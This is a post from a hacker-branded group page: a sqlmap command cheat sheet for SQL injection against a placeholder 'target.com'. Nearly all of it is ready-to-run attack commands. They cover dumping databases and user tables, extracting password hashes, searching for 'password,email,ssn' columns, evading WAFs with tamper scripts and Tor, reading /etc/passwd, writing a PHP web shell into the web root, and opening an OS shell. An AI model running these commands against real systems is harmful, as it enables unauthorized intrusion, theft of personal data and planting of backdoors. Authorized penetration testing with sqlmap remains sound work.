top of page
Hooded hacker working on multiple computer screens showing 'Hacker'

VIPHACKER.100 Group

Public·69 members

Sqlmap Command Sheet

https://github.com/sqlmapproject/sqlmap/wiki/usage

### Basic Enumeration


| Goal | Command |

|---|---|

| List databases | `sqlmap -u "http://target.com/page.php?id=1" --dbs` |

| List tables in a DB | `sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables` |

| List columns in a table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --columns` |

| Dump entire table | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump` |

| Dump limited rows | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump --start=1 --stop=20` |

| Dump specific columns | `sqlmap -u "http://target.com/page.php?id=1" -D dbname -T tablename --dump -C "col1,col2,col3"` |


### WAF / 403 Bypass


| Goal | Command |

|---|---|

| Random User-Agent | `--random-agent` |

| Tamper scripts | `--tamper=space2comment` |

| Multiple tamper scripts | `--tamper=space2comment,between,randomcase` |

| Delay between requests | `--delay=1` |

| Increase timeout | `--timeout=10` |

| Use HTTP(S) proxy | `--proxy="http://127.0.0.1:8080"` |

| Tor proxy | `--tor --tor-type=SOCKS5` |

| Randomize parameters | `--randomize=id` |

| Skip URL encoding | `--skip-urlencode` |

| Use stealthier level/risk | `--level=1 --risk=1` (default, slower but quieter) |


### Authentication & Headers


| Goal | Command |

|---|---|

| Cookie | `--cookie="PHPSESSID=abc123"` |

| Custom header | `--headers="X-Forwarded-For: 127.0.0.1"` |

| HTTP auth | `--auth-type=Basic --auth-cred="user:pass"` |

| POST data | `-u "http://target.com/login.php" --data="user=admin&pass=test"` |


### Injection Point Control


| Goal | Command |

|---|---|

| Specify injection param | `-p "id"` |

| Test all GET params | `--level=5 --risk=3` |

| Skip specific params | `--skip="token,captcha"` |

| Provide param in URL | `-u "http://target.com/page.php?id=1&cat=5"` |

| From POST body | `-u "http://target.com/api" --data="id=1"` |


### Data Extraction Options


| Goal | Command |

|---|---|

| Search for columns | `--search -C "password,email,ssn"` |

| Get DB user | `--current-user` |

| Get DB name | `--current-db` |

| Get DB version banner | `--banner` |

| Check if DBA (admin) | `--is-dba` |

| List DB users | `--users` |

| List DB user passwords | `--passwords` |

| OS shell (if file privs) | `--os-shell` |

| SQL shell | `--sql-shell` |


### Read/Write Files (requires FILE privilege)


| Goal | Command |

|---|---|

| Read file | `--file-read="/etc/passwd"` |

| Write file | `--file-write="/tmp/shell.php" --file-dest="/var/www/html/shell.php"` |


### Output & Session


| Goal | Command |

|---|---|

| Resume saved session | (auto — just run same URL again) |

| Flush session | `--flush-session` |

| Output to CSV/TSV | auto-generated under `~/.local/share/sqlmap/output/` (Linux) or `%LOCALAPPDATA%\sqlmap\output\` (Windows) |

| Batch mode (default yes) | `--batch` |


---


### Common Combo (new site — full recon)


```bash

sqlmap -u "http://target.com/page.php?id=1" --random-agent --tamper=space2comment --batch --dbs

```


### Common Combo (dump specific table with bypass)


```bash

sqlmap -u "http://target.com/page.php?id=1" -D targetdb -T users --dump --random-agent --tamper=space2comment --batch --start=1 --stop=50

```


### If you have a request file (from Burp/ZAP)


```bash

sqlmap -r request.txt --batch

```




3 Views

©2025-26 BY VIPHACKER.100 | ARYAN AHIRWAR

  • Linkedin
  • Facebook
  • Youtube
  • alt.text.label.Instagram
bottom of page